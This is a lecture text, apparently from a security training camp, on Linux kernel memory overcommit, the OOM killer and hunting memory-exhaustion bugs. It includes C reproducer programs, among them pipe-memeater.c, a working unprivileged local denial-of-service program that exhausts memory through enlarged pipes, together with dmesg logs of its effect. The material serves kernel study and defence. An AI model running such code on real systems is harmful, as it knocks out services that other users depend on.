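Memory management in the Linux kernel is highly optimistic. On a Linux system that does not apply appropriate resource limits using the memory cgroup, an Out of memory local DoS attack, which exhausts system memory and renders the system inoperable, is therefore easy to mount. Because the same condition can arise without any intent to attack, it is also a cause of unexplained hangs and other problems that undermine the stable operation of Linux systems.

In this lecture, we learn how to find bugs caused by memory exhaustion (bug hunting) while looking back at the fierce battle over Linux kernel memory management (a topic that began with a vulnerability the lecturer found by chance and is still ongoing), and we consider how to cope with a situation in which bugs caused by memory exhaustion cannot be eradicated.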

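Many example programs that trigger Out of memory local DoS attacks appear in this lecture. Needless to say, you must not run them on machines that you do not administer.

Even in an attack-and-defense CTF, running these programs may get you disqualified for "placing an excessive load" on the environment.

The lecturer is not a memory management expert, and has never seriously studied a book explaining the Linux kernel. This lecture covers what was learned through experience and is not told in such books.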

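The reproducer programs were written for the following environment. A virtual environment such as VMware Player is fine.

| Item | Value |
| --- | --- |
| Number of CPUs | 4 (x86_64 architecture) |
| RAM | 1024MB or 2048MB (non-NUMA system) |
| Swap space | None |
| Hard disk | A disk recognized as /dev/sda (if it is not recognized as a SCSI device, the problems may not be reproducible) |
| CD-ROM | A drive recognized as /dev/sr0 (if it is not recognized as a SCSI device, the problems may not be reproducible) |
| Mount layout | /dev/sda1 formatted with ext4 or xfs and mounted on / |

Please note that results may differ depending on variables such as the kernel version, the system configuration, and the timing of execution.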

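From April 2003 to March 2012, I was involved in developing TOMOYO Linux, an access control module for Linux systems. Buffer overflow vulnerabilities and OS command injection vulnerabilities could not be eradicated, and at first the only access control module available was SELinux, which was hard to understand.

For the hardships of getting TOMOYO Linux merged into the mainline kernel, please see the lecture materials from Security & Programming Camp 2011.

For the evolution from TOMOYO Linux to AKARI and CaitSith, please see the lecture materials from Security Camp 2012.

If you are interested in dealing with OS command injection vulnerabilities such as ShellShock, please see the lecture materials from Security Camp 2015.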

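From April 2012 to March 2015, I worked at a support center, mainly handling inquiries about systems running RHEL 4 / RHEL 5 / RHEL 6. Through the development of TOMOYO Linux I had been exposed to programming inside the Linux kernel (though, given the nature of an access control module, only the superficial parts close to user space), so I was assigned the inquiries for which no reproduction or investigation procedure had been established and for which we had to find out what was happening (by writing investigation programs).

Requests to investigate the cause of an unexpected hang or reboot are common. However, /var/log/messages contained no messages that could serve as clues, and we were rarely able to identify the cause of a hang.

Reasoning that "we cannot expect messages emitted during a hang to be recorded in log files, but the kernel may have been printing some messages," I proposed enabling the serial console or netconsole, but I do not recall a single case in which that yielded any messages. It was like being handed one CTF guessing ("esper") challenge after another, and I could not accept the situation.

The discussions since November 2014 can be traced mainly through the archives of the linux-mm mailing list.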

In user space, memory allocation requests almost never fail. Because overcommit is allowed by default, a program can request more memory than the system has installed, for example via malloc().

---------- overcommit.c ----------
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
    unsigned long size = 0;
    char *buf = NULL;

    /* Keep growing the buffer by 1MB until realloc() finally fails. */
    while (1) {
        char *cp = realloc(buf, size + 1048576);

        if (!cp)
            break;
        buf = cp;
        size += 1048576;
    }
    /* The memory was only requested; it is never written to. */
    printf("Allocated %lu MB\n", size / 1048576);
    free(buf);
    printf("Freed %lu MB\n", size / 1048576);
    return 0;
}
---------- overcommit.c ----------

---------- Example output: begin ----------
[kumaneko@localhost ~]$ cat /proc/meminfo
MemTotal: 1914588 kB
MemFree: 1758600 kB
Buffers: 9044 kB
Cached: 55324 kB
SwapCached: 0 kB
Active: 38408 kB
Inactive: 42832 kB
Active(anon): 17112 kB
Inactive(anon): 4 kB
Active(file): 21296 kB
Inactive(file): 42828 kB
Unevictable: 0 kB
Mlocked: 0 kB
SwapTotal: 0 kB
SwapFree: 0 kB
Dirty: 64 kB
Writeback: 0 kB
AnonPages: 16888 kB
Mapped: 12552 kB
Shmem: 228 kB
Slab: 36644 kB
SReclaimable: 10984 kB
SUnreclaim: 25660 kB
KernelStack: 3760 kB
PageTables: 2892 kB
NFS_Unstable: 0 kB
Bounce: 0 kB
WritebackTmp: 0 kB
CommitLimit: 957292 kB
Committed_AS: 92500 kB
VmallocTotal: 34359738367 kB
VmallocUsed: 149588 kB
VmallocChunk: 34359581684 kB
HardwareCorrupted: 0 kB
AnonHugePages: 2048 kB
HugePages_Total: 0
HugePages_Free: 0
HugePages_Rsvd: 0
HugePages_Surp: 0
Hugepagesize: 2048 kB
DirectMap4k: 6144 kB
DirectMap2M: 1042432 kB
DirectMap1G: 1048576 kB
[kumaneko@localhost ~]$ ./overcommit
Allocated 100663295 MB
Freed 100663295 MB
[kumaneko@localhost ~]$
---------- Example output: end ----------

Thanks to overcommit, many processes can be kept running at the same time.















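The OOM killer is a mechanism that is invoked when the system falls into an Out of memory (OOM) state; by resolving that state, it lets the Linux system try to survive.

It forcibly terminates a process by sending it the SIGKILL signal, and reclaims the memory.

The premise is that, because the SIGKILL signal cannot be ignored, the memory can supposedly always be reclaimed.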





























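| Danger level 0: still plenty of room | Danger level 1: getting risky | Danger level 2: an OOM state has occurred | Danger level 3: game over |
| --- | --- | --- | --- |
| When there is enough free memory, no memory needs to be reclaimed. | When free memory drops to low:, kswapd reclaims memory asynchronously until it returns to high:. If asynchronous reclaim by kswapd cannot keep up, the process requesting the allocation also reclaims memory synchronously (direct reclaim). | When free memory drops to min: and no more memory can be reclaimed, the system is in an OOM state. If invoking the OOM killer is permitted, the OOM killer reclaims memory by sending the SIGKILL signal to a process and forcibly terminating it. | Once free memory reaches 0, the system hangs in most cases. |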

---------- oom.c ----------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
    unsigned long size = 0;
    char *buf = NULL;

    /* Keep growing the buffer by 1MB until realloc() finally fails. */
    while (1) {
        char *cp = realloc(buf, size + 1048576);

        if (!cp)
            break;
        buf = cp;
        size += 1048576;
    }
    printf("Allocated %lu MB\n", size / 1048576);
    /* Unlike overcommit.c, actually write to all of the requested memory. */
    memset(buf, 0, size);
    printf("Filled %lu MB\n", size / 1048576);
    free(buf);
    printf("Freed %lu MB\n", size / 1048576);
    return 0;
}
---------- oom.c ----------

---------- Example output: begin ----------
[kumaneko@localhost ~]$ ./oom
Allocated 100663295 MB
Killed
[kumaneko@localhost ~]$ dmesg
[ 164.825320] oom invoked oom-killer: gfp_mask=0x280da, order=0, oom_adj=0, oom_score_adj=0
[ 164.826957] oom cpuset=/ mems_allowed=0
[ 164.827789] Pid: 1615, comm: oom Not tainted 2.6.32-573.26.1.el6.x86_64 #1
[ 164.829140] Call Trace:
[ 164.829593] [<ffffffff810d7151>] ? cpuset_print_task_mems_allowed+0x91/0xb0
[ 164.830855] [<ffffffff8112a950>] ? dump_header+0x90/0x1b0
[ 164.832089] [<ffffffff8123360c>] ? security_real_capable_noaudit+0x3c/0x70
[ 164.833303] [<ffffffff8112add2>] ? oom_kill_process+0x82/0x2a0
[ 164.834402] [<ffffffff8112ad11>] ? select_bad_process+0xe1/0x120
[ 164.835512] [<ffffffff8112b210>] ? out_of_memory+0x220/0x3c0
[ 164.836543] [<ffffffff81137bec>] ? __alloc_pages_nodemask+0x93c/0x950
[ 164.837692] [<ffffffff81170a7a>] ? alloc_pages_vma+0x9a/0x150
[ 164.838743] [<ffffffff81152edd>] ? handle_pte_fault+0x73d/0xb20
[ 164.839886] [<ffffffff810537b7>] ? pte_alloc_one+0x37/0x50
[ 164.841020] [<ffffffff8118c559>] ? do_huge_pmd_anonymous_page+0xb9/0x3b0
[ 164.842306] [<ffffffff81153559>] ? handle_mm_fault+0x299/0x3d0
[ 164.843400] [<ffffffff810663f3>] ? perf_event_task_sched_out+0x33/0x70
[ 164.844603] [<ffffffff8104f156>] ? __do_page_fault+0x146/0x500
[ 164.845672] [<ffffffff8153927e>] ? thread_return+0x4e/0x7d0
[ 164.846723] [<ffffffff8153f90e>] ? do_page_fault+0x3e/0xa0
[ 164.847953] [<ffffffff8153cc55>] ? page_fault+0x25/0x30
[ 164.848914] Mem-Info:
[ 164.849339] Node 0 DMA per-cpu:
[ 164.849937] CPU 0: hi: 0, btch: 1 usd: 0
[ 164.850804] CPU 1: hi: 0, btch: 1 usd: 0
[ 164.851781] CPU 2: hi: 0, btch: 1 usd: 0
[ 164.852670] CPU 3: hi: 0, btch: 1 usd: 0
[ 164.853632] Node 0 DMA32 per-cpu:
[ 164.854269] CPU 0: hi: 186, btch: 31 usd: 0
[ 164.855133] CPU 1: hi: 186, btch: 31 usd: 0
[ 164.856152] CPU 2: hi: 186, btch: 31 usd: 0
[ 164.857041] CPU 3: hi: 186, btch: 31 usd: 0
[ 164.858033] active_anon:446933 inactive_anon:1 isolated_anon:0
[ 164.858034] active_file:0 inactive_file:14 isolated_file:0
[ 164.858034] unevictable:0 dirty:1 writeback:0 unstable:0
[ 164.858034] free:13259 slab_reclaimable:1902 slab_unreclaimable:6401
[ 164.858035] mapped:9 shmem:57 pagetables:1732 bounce:0
[ 164.863169] Node 0 DMA free:8336kB min:332kB low:412kB high:496kB active_anon:7332kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15300kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:0kB slab_reclaimable:0kB slab_unreclaimable:0kB kernel_stack:0kB pagetables:40kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes
[ 164.870125] lowmem_reserve[]: 0 2004 2004 2004
[ 164.871060] Node 0 DMA32 free:44700kB min:44720kB low:55900kB high:67080kB active_anon:1780400kB inactive_anon:4kB active_file:0kB inactive_file:56kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2052192kB mlocked:0kB dirty:4kB writeback:0kB mapped:36kB shmem:228kB slab_reclaimable:7608kB slab_unreclaimable:25604kB kernel_stack:3776kB pagetables:6888kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:690 all_unreclaimable? yes
[ 164.878996] lowmem_reserve[]: 0 0 0 0
[ 164.879969] Node 0 DMA: 2*4kB 1*8kB 4*16kB 2*32kB 2*64kB 1*128kB 1*256kB 1*512kB 1*1024kB 1*2048kB 1*4096kB = 8336kB
[ 164.882265] Node 0 DMA32: 496*4kB 137*8kB 45*16kB 26*32kB 38*64kB 11*128kB 2*256kB 8*512kB 13*1024kB 5*2048kB 2*4096kB = 44824kB
[ 164.884786] 99 total pagecache pages
[ 164.885462] 0 pages in swap cache
[ 164.886100] Swap cache stats: add 0, delete 0, find 0/0
[ 164.887027] Free swap = 0kB
[ 164.887677] Total swap = 0kB
[ 164.890966] 524272 pages RAM
[ 164.891554] 45689 pages reserved
[ 164.892198] 460 pages shared
[ 164.892760] 459990 pages non-shared
[ 164.893400] [ pid ] uid tgid total_vm rss cpu oom_adj oom_score_adj name
[ 164.894783] [ 485] 0 485 2672 118 3 -17 -1000 udevd
[ 164.896319] [ 1139] 0 1139 2280 123 2 0 0 dhclient
[ 164.897721] [ 1195] 0 1195 6899 60 2 -17 -1000 auditd
[ 164.899068] [ 1217] 0 1217 62272 649 0 0 0 rsyslogd
[ 164.900463] [ 1246] 81 1246 5388 107 1 0 0 dbus-daemon
[ 164.901944] [ 1259] 0 1259 20705 222 0 0 0 NetworkManager
[ 164.903465] [ 1263] 0 1263 14530 124 3 0 0 modem-manager
[ 164.905125] [ 1298] 68 1298 9588 292 3 0 0 hald
[ 164.906547] [ 1299] 0 1299 5099 54 3 0 0 hald-runner
[ 164.908127] [ 1337] 0 1337 5627 47 1 0 0 hald-addon-rfki
[ 164.909747] [ 1345] 0 1345 5629 47 0 0 0 hald-addon-inpu
[ 164.911254] [ 1346] 0 1346 11247 133 2 0 0 wpa_supplicant
[ 164.912993] [ 1351] 68 1351 4501 41 2 0 0 hald-addon-acpi
[ 164.914570] [ 1372] 0 1372 16558 177 0 -17 -1000 sshd
[ 164.915955] [ 1451] 0 1451 20222 226 2 0 0 master
[ 164.917391] [ 1463] 89 1463 20242 217 0 0 0 pickup
[ 164.918860] [ 1464] 89 1464 20259 218 1 0 0 qmgr
[ 164.920391] [ 1465] 0 1465 29216 152 2 0 0 crond
[ 164.921769] [ 1479] 0 1479 17403 127 3 0 0 login
[ 164.923171] [ 1480] 0 1480 1020 23 0 0 0 agetty
[ 164.924621] [ 1482] 0 1482 1016 21 3 0 0 mingetty
[ 164.926043] [ 1484] 0 1484 1016 21 3 0 0 mingetty
[ 164.927490] [ 1486] 0 1486 1016 22 3 0 0 mingetty
[ 164.928890] [ 1488] 0 1488 1016 20 3 0 0 mingetty
[ 164.930313] [ 1490] 0 1490 1016 22 2 0 0 mingetty
[ 164.931718] [ 1495] 0 1495 2671 117 1 -17 -1000 udevd
[ 164.933090] [ 1496] 0 1496 2671 117 3 -17 -1000 udevd
[ 164.934490] [ 1498] 0 1498 521256 370 1 0 0 console-kit-dae
[ 164.935999] [ 1565] 0 1565 27075 101 1 0 0 bash
[ 164.937387] [ 1580] 0 1580 25629 254 0 0 0 sshd
[ 164.938787] [ 1582] 500 1582 25629 252 0 0 0 sshd
[ 164.940167] [ 1583] 500 1583 27076 97 0 0 0 bash
[ 164.941506] [ 1615] 500 1615 25769820886 442651 2 0 0 oom
[ 164.942905] Out of memory: Kill process 1615 (oom) score 926 or sacrifice child
[ 164.944495] Killed process 1615, UID 500, (oom) total-vm:103079283544kB, anon-rss:1770600kB, file-rss:4kB
[kumaneko@localhost ~]$
---------- Example output: end ----------

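It looks like the OOM killer is working properly, doesn't it?

Linux has a feature called cgroup for limiting resource usage, and one of its controllers, the memory cgroup, can limit memory usage per group. If it is not configured appropriately, however, a system-wide OOM state cannot be avoided.

As a rule, this lecture deals only with system-wide OOM.

But if we stopped here, this would be nothing more than an explanation for users. This lecture goes into the dark side of memory management in the Linux kernel.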

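One day in June 2013, while running git bisect on a problem I had hit while testing a development kernel, I came across a curious patch.

[35f3d14dbbc58447c61e38a162ea10add6b31dc7] pipe: add support for shrinking and growing pipes

So I looked into the related patches, and it turned out that even an unprivileged user can grow a pipe from 64KB to 1MB.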

---------- pipe-memeater.c ----------
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>
#define F_SETPIPE_SZ (1024 + 7)

static void child(void)
{
    int fd[2];

    /* Create pipes and grow each one to 1MB until pipe() or fcntl() fails. */
    while (pipe(fd) != EOF &&
           fcntl(fd[1], F_SETPIPE_SZ, 1048576) != EOF) {
        int i;

        /* Fill the whole 1MB buffer (256 * 4096 bytes). */
        for (i = 0; i < 256; i++) {
            static char buf[4096];

            if (write(fd[1], buf, sizeof(buf)) != sizeof(buf)) {
                printf("write error\n");
                _exit(1);
            }
        }
        /* Close only the read end; the write end stays open, so the filled buffer remains. */
        close(fd[0]);
    }
    pause();
    _exit(0);
}

int main(int argc, char *argv[])
{
    int i;

    /* Close every descriptor except stdout so that more pipes can be opened. */
    close(0);
    for (i = 2; i < 1024; i++)
        close(i);
    for (i = 0; i < 10; i++)
        if (fork() == 0)
            child();
    return 0;
}
---------- pipe-memeater.c ----------

---------- Example output: begin ----------

[kumaneko@localhost ~]$ pstree -pA

init(1)-+-NetworkManager(1206)

|-agetty(1430)

|-auditd(1142)---{auditd}(1143)

|-bonobo-activati(1630)---{bonobo-activat}(1631)

|-console-kit-dae(1440)-+-{console-kit-da}(1441)

| |-{console-kit-da}(1442)

| |-{console-kit-da}(1443)

| |-{console-kit-da}(1444)

| |-{console-kit-da}(1445)

| |-{console-kit-da}(1446)

| |-{console-kit-da}(1447)

| |-{console-kit-da}(1448)

| |-{console-kit-da}(1449)

| |-{console-kit-da}(1450)

| |-{console-kit-da}(1451)

| |-{console-kit-da}(1452)

| |-{console-kit-da}(1453)

| |-{console-kit-da}(1454)

| |-{console-kit-da}(1455)

| |-{console-kit-da}(1456)

| |-{console-kit-da}(1457)

| |-{console-kit-da}(1458)

| |-{console-kit-da}(1459)

| |-{console-kit-da}(1460)

| |-{console-kit-da}(1461)

| |-{console-kit-da}(1462)

| |-{console-kit-da}(1463)

| |-{console-kit-da}(1464)

| |-{console-kit-da}(1465)

| |-{console-kit-da}(1466)

| |-{console-kit-da}(1467)

| |-{console-kit-da}(1468)

| |-{console-kit-da}(1469)

| |-{console-kit-da}(1470)

| |-{console-kit-da}(1471)

| |-{console-kit-da}(1472)

| |-{console-kit-da}(1473)

| |-{console-kit-da}(1474)

| |-{console-kit-da}(1475)

| |-{console-kit-da}(1476)

| |-{console-kit-da}(1477)

| |-{console-kit-da}(1478)

| |-{console-kit-da}(1479)

| |-{console-kit-da}(1480)

| |-{console-kit-da}(1481)

| |-{console-kit-da}(1482)

| |-{console-kit-da}(1483)

| |-{console-kit-da}(1484)

| |-{console-kit-da}(1485)

| |-{console-kit-da}(1486)

| |-{console-kit-da}(1487)

| |-{console-kit-da}(1488)

| |-{console-kit-da}(1489)

| |-{console-kit-da}(1490)

| |-{console-kit-da}(1491)

| |-{console-kit-da}(1492)

| |-{console-kit-da}(1493)

| |-{console-kit-da}(1494)

| |-{console-kit-da}(1495)

| |-{console-kit-da}(1496)

| |-{console-kit-da}(1497)

| |-{console-kit-da}(1498)

| |-{console-kit-da}(1499)

| |-{console-kit-da}(1500)

| |-{console-kit-da}(1501)

| |-{console-kit-da}(1502)

| `-{console-kit-da}(1504)

|-crond(1408)

|-dbus-daemon(1601)

|-dbus-daemon(1193)

|-dbus-launch(1600)

|-devkit-power-da(1605)

|-dhclient(1086)

|-gconfd-2(1609)

|-gdm-binary(1567)-+-gdm-simple-slav(1580)-+-Xorg(1583)

| | |-gdm-session-wor(1661)

| | |-gnome-session(1602)-+-at-spi-registry(1625)

| | | |-gdm-simple-gree(1641)---{gdm-simple-gre}(1652)

| | | |-gnome-power-man(1642)

| | | |-metacity(1638)

| | | |-polkit-gnome-au(1640)

| | | `-{gnome-session}(1626)

| | `-{gdm-simple-sla}(1584)

| `-{gdm-binary}(1581)

|-gnome-settings-(1628)---{gnome-settings}(1633)

|-gvfsd(1637)

|-hald(1245)-+-hald-runner(1246)-+-hald-addon-acpi(1295)

| | |-hald-addon-inpu(1293)

| | `-hald-addon-rfki(1285)

| `-{hald}(1247)

|-login(1424)---bash(1507)

|-master(1396)-+-pickup(1411)

| `-qmgr(1413)

|-mingetty(1426)

|-mingetty(1428)

|-mingetty(1431)

|-mingetty(1433)

|-mingetty(1435)

|-modem-manager(1211)

|-notification-da(1651)

|-polkitd(1645)

|-pulseaudio(1654)---{pulseaudio}(1660)

|-rsyslogd(1164)-+-{rsyslogd}(1165)

| |-{rsyslogd}(1166)

| `-{rsyslogd}(1167)

|-rtkit-daemon(1656)-+-{rtkit-daemon}(1657)

| `-{rtkit-daemon}(1658)

|-sshd(1317)---sshd(1664)---sshd(1666)---bash(1667)---pstree(1684)

|-udevd(423)-+-udevd(1437)

| `-udevd(1438)

`-wpa_supplicant(1282)

[kumaneko@localhost ~]$ ./pipe-memeater

(re-login portion omitted)

[kumaneko@localhost ~]$ dmesg

[ 100.086247] pipe-memeater invoked oom-killer: gfp_mask=0x200d2, order=0, oom_adj=0

[ 100.087747] pipe-memeater cpuset=/ mems_allowed=0

[ 100.088693] Pid: 1687, comm: pipe-memeater Not tainted 2.6.35.14 #1

[ 100.089949] Call Trace:

[ 100.090640] [<ffffffff810ac9e1>] ? cpuset_print_task_mems_allowed+0x91/0xa0

[ 100.092080] [<ffffffff810f8e4e>] dump_header+0x6e/0x1c0

[ 100.093106] [<ffffffff8121b950>] ? ___ratelimit+0xa0/0x120

[ 100.094226] [<ffffffff810f9021>] oom_kill_process+0x81/0x180

[ 100.095432] [<ffffffff810f9558>] __out_of_memory+0x58/0xd0

[ 100.096745] [<ffffffff810f9656>] out_of_memory+0x86/0x1b0

[ 100.097796] [<ffffffff810fe4dc>] __alloc_pages_nodemask+0x7dc/0x7f0

[ 100.098990] [<ffffffff8112e87a>] alloc_pages_current+0x9a/0x100

[ 100.100181] [<ffffffff8114de87>] pipe_write+0x387/0x670

[ 100.101200] [<ffffffff8114504a>] do_sync_write+0xda/0x120

[ 100.102284] [<ffffffff8114e7ad>] ? pipe_fcntl+0x11d/0x230

[ 100.103319] [<ffffffff8113583c>] ? __kmalloc+0x21c/0x230

[ 100.104381] [<ffffffff811cb556>] ? security_file_permission+0x16/0x20

[ 100.105659] [<ffffffff81145328>] vfs_write+0xb8/0x1a0

[ 100.106684] [<ffffffff810ba932>] ? audit_syscall_entry+0x252/0x280

[ 100.108022] [<ffffffff81145cd1>] sys_write+0x51/0x90

[ 100.109007] [<ffffffff8100aff2>] system_call_fastpath+0x16/0x1b

[ 100.110197] Mem-Info:

[ 100.110644] Node 0 DMA per-cpu:

[ 100.111327] CPU 0: hi: 0, btch: 1 usd: 0

[ 100.112277] CPU 1: hi: 0, btch: 1 usd: 0

[ 100.113140] CPU 2: hi: 0, btch: 1 usd: 0

[ 100.114110] CPU 3: hi: 0, btch: 1 usd: 0

[ 100.114971] Node 0 DMA32 per-cpu:

[ 100.115658] CPU 0: hi: 186, btch: 31 usd: 0

[ 100.116654] CPU 1: hi: 186, btch: 31 usd: 32

[ 100.117595] CPU 2: hi: 186, btch: 31 usd: 0

[ 100.118537] CPU 3: hi: 186, btch: 31 usd: 0

[ 100.119483] active_anon:11091 inactive_anon:3641 isolated_anon:0

[ 100.119484] active_file:21 inactive_file:24 isolated_file:0

[ 100.119485] unevictable:0 dirty:21 writeback:0 unstable:0

[ 100.119485] free:3422 slab_reclaimable:4462 slab_unreclaimable:22253

[ 100.119485] mapped:276 shmem:305 pagetables:1864 bounce:0

[ 100.125138] Node 0 DMA free:8024kB min:40kB low:48kB high:60kB active_anon:0kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15704kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:0kB slab_reclaimable:0kB slab_unreclaimable:100kB kernel_stack:0kB pagetables:0kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes

[ 100.132211] lowmem_reserve[]: 0 2004 2004 2004

[ 100.133220] Node 0 DMA32 free:5664kB min:5708kB low:7132kB high:8560kB active_anon:44108kB inactive_anon:14820kB active_file:84kB inactive_file:96kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2052192kB mlocked:0kB dirty:84kB writeback:0kB mapped:1104kB shmem:1220kB slab_reclaimable:17848kB slab_unreclaimable:88912kB kernel_stack:2008kB pagetables:7456kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:1412 all_unreclaimable? yes

[ 100.141024] lowmem_reserve[]: 0 0 0 0

[ 100.141879] Node 0 DMA: 1*4kB 2*8kB 0*16kB 2*32kB 2*64kB 1*128kB 2*256kB 2*512kB 2*1024kB 2*2048kB 0*4096kB = 8020kB

[ 100.144271] Node 0 DMA32: 676*4kB 7*8kB 0*16kB 0*32kB 1*64kB 1*128kB 0*256kB 0*512kB 1*1024kB 1*2048kB 0*4096kB = 6024kB

[ 100.146722] 346 total pagecache pages

[ 100.147435] 0 pages in swap cache

[ 100.148090] Swap cache stats: add 0, delete 0, find 0/0

[ 100.149096] Free swap = 0kB

[ 100.149671] Total swap = 0kB

[ 100.152844] 524272 pages RAM

[ 100.153432] 13239 pages reserved

[ 100.154126] 1067 pages shared

[ 100.154695] 488972 pages non-shared

[ 100.155379] [ pid ] uid tgid total_vm rss cpu oom_adj name

[ 100.156582] [ 1] 0 1 4851 75 1 0 init

[ 100.157793] [ 423] 0 423 2767 200 0 -17 udevd

[ 100.158985] [ 1086] 0 1086 2292 122 1 0 dhclient

[ 100.160335] [ 1142] 0 1142 6399 49 1 -17 auditd

[ 100.161553] [ 1164] 0 1164 60746 96 1 0 rsyslogd

[ 100.162787] [ 1193] 81 1193 5471 159 3 0 dbus-daemon

[ 100.164070] [ 1206] 0 1206 20717 219 0 0 NetworkManager

[ 100.165406] [ 1211] 0 1211 14542 123 1 0 modem-manager

[ 100.166709] [ 1245] 68 1245 9089 296 0 0 hald

[ 100.167855] [ 1246] 0 1246 5111 56 3 0 hald-runner

[ 100.169135] [ 1282] 0 1282 11259 132 3 0 wpa_supplicant

[ 100.170476] [ 1285] 0 1285 5639 42 1 0 hald-addon-rfki

[ 100.171936] [ 1293] 0 1293 5641 42 0 0 hald-addon-inpu

[ 100.173260] [ 1295] 68 1295 4513 40 3 0 hald-addon-acpi

[ 100.174622] [ 1317] 0 1317 16570 177 0 -17 sshd

[ 100.175790] [ 1396] 0 1396 20234 218 0 0 master

[ 100.177024] [ 1408] 0 1408 29216 152 2 0 crond

[ 100.178188] [ 1411] 89 1411 20254 217 1 0 pickup

[ 100.179389] [ 1413] 89 1413 20271 216 1 0 qmgr

[ 100.180571] [ 1424] 0 1424 17415 123 3 0 login

[ 100.181737] [ 1426] 0 1426 1028 21 2 0 mingetty

[ 100.182983] [ 1428] 0 1428 1028 21 3 0 mingetty

[ 100.184222] [ 1430] 0 1430 1032 21 0 0 agetty

[ 100.185481] [ 1431] 0 1431 1028 21 1 0 mingetty

[ 100.187031] [ 1433] 0 1433 1028 20 1 0 mingetty

[ 100.188345] [ 1435] 0 1435 1028 21 2 0 mingetty

[ 100.189638] [ 1437] 0 1437 2683 116 3 -17 udevd

[ 100.190865] [ 1438] 0 1438 2683 116 2 -17 udevd

[ 100.192152] [ 1440] 0 1440 520756 243 3 0 console-kit-dae

[ 100.193565] [ 1507] 0 1507 27088 95 1 0 bash

[ 100.194796] [ 1567] 0 1567 33001 79 1 0 gdm-binary

[ 100.196134] [ 1580] 0 1580 40656 150 3 0 gdm-simple-slav

[ 100.197543] [ 1583] 0 1583 42848 4384 2 0 Xorg

[ 100.198911] [ 1600] 42 1600 5021 55 1 0 dbus-launch

[ 100.200288] [ 1601] 42 1601 5402 79 3 0 dbus-daemon

[ 100.201579] [ 1602] 42 1602 66762 476 3 0 gnome-session

[ 100.202944] [ 1605] 0 1605 12502 161 3 0 devkit-power-da

[ 100.204322] [ 1609] 42 1609 33068 538 0 0 gconfd-2

[ 100.205580] [ 1625] 42 1625 30187 283 0 0 at-spi-registry

[ 100.206961] [ 1628] 42 1628 86331 943 0 0 gnome-settings-

[ 100.208318] [ 1630] 42 1630 88624 186 1 0 bonobo-activati

[ 100.210025] [ 1637] 42 1637 33831 76 2 0 gvfsd

[ 100.211269] [ 1638] 42 1638 71465 679 0 0 metacity

[ 100.212521] [ 1640] 42 1640 62088 437 3 0 polkit-gnome-au

[ 100.213886] [ 1641] 42 1641 94596 1210 2 0 gdm-simple-gree

[ 100.215265] [ 1642] 42 1642 68437 516 2 0 gnome-power-man

[ 100.216677] [ 1645] 0 1645 13169 304 1 0 polkitd

[ 100.217893] [ 1654] 42 1654 85934 194 1 0 pulseaudio

[ 100.220379] [ 1656] 498 1656 41101 45 2 0 rtkit-daemon

[ 100.221717] [ 1661] 0 1661 35453 91 1 0 gdm-session-wor

[ 100.223103] [ 1664] 0 1664 25640 254 0 0 sshd

[ 100.224290] [ 1666] 500 1666 25640 252 0 0 sshd

[ 100.225575] [ 1667] 500 1667 27088 92 3 0 bash

[ 100.226844] [ 1686] 500 1686 993 18 0 0 pipe-memeater

[ 100.228117] [ 1687] 500 1687 993 18 3 0 pipe-memeater

[ 100.229486] [ 1688] 500 1688 993 18 1 0 pipe-memeater

[ 100.230815] [ 1689] 500 1689 993 18 0 0 pipe-memeater

[ 100.232127] [ 1690] 500 1690 993 18 2 0 pipe-memeater

[ 100.233439] [ 1691] 500 1691 993 18 0 0 pipe-memeater

[ 100.234773] [ 1692] 500 1692 993 18 1 0 pipe-memeater

[ 100.236084] [ 1693] 500 1693 993 18 0 0 pipe-memeater

[ 100.237375] [ 1694] 500 1694 993 18 2 0 pipe-memeater

[ 100.238727] [ 1695] 500 1695 993 18 0 0 pipe-memeater

[ 100.240035] Out of memory: kill process 1602 (gnome-session) score 230152 or a child

[ 100.241502] Killed process 1625 (at-spi-registry) vsz:120748kB, anon-rss:1132kB, file-rss:0kB

(repeated portion omitted)

[ 117.042248] pipe-memeater invoked oom-killer: gfp_mask=0x201da, order=0, oom_adj=0

[ 117.047397] pipe-memeater cpuset=/ mems_allowed=0

[ 117.050821] Pid: 1695, comm: pipe-memeater Not tainted 2.6.35.14 #1

[ 117.055079] Call Trace:

[ 117.056842] [<ffffffff810ac9e1>] ? cpuset_print_task_mems_allowed+0x91/0xa0

[ 117.061573] [<ffffffff810f8e4e>] dump_header+0x6e/0x1c0

[ 117.065216] [<ffffffff8121b950>] ? ___ratelimit+0xa0/0x120

[ 117.069040] [<ffffffff810f9021>] oom_kill_process+0x81/0x180

[ 117.072962] [<ffffffff810f9558>] __out_of_memory+0x58/0xd0

[ 117.076774] [<ffffffff810f9656>] out_of_memory+0x86/0x1b0

[ 117.080130] [<ffffffff810fe4dc>] __alloc_pages_nodemask+0x7dc/0x7f0

[ 117.081905] [<ffffffff810503f9>] ? finish_task_switch+0x49/0xb0

[ 117.083564] [<ffffffff8112e87a>] alloc_pages_current+0x9a/0x100

[ 117.085189] [<ffffffff810f6627>] __page_cache_alloc+0x87/0x90

[ 117.086761] [<ffffffff8110056b>] __do_page_cache_readahead+0xdb/0x210

[ 117.088509] [<ffffffff811006c1>] ra_submit+0x21/0x30

[ 117.089867] [<ffffffff810f7eb0>] filemap_fault+0x400/0x450

[ 117.091370] [<ffffffff81111c34>] __do_fault+0x54/0x550

[ 117.092783] [<ffffffff811148f5>] handle_mm_fault+0x1c5/0xce0

[ 117.094331] [<ffffffff8114e7ad>] ? pipe_fcntl+0x11d/0x230

[ 117.095809] [<ffffffff8113583c>] ? __kmalloc+0x21c/0x230

[ 117.097269] [<ffffffff8148817c>] do_page_fault+0x11c/0x320

[ 117.098771] [<ffffffff81484e35>] page_fault+0x25/0x30

[ 117.100186] Mem-Info:

[ 117.100828] Node 0 DMA per-cpu:

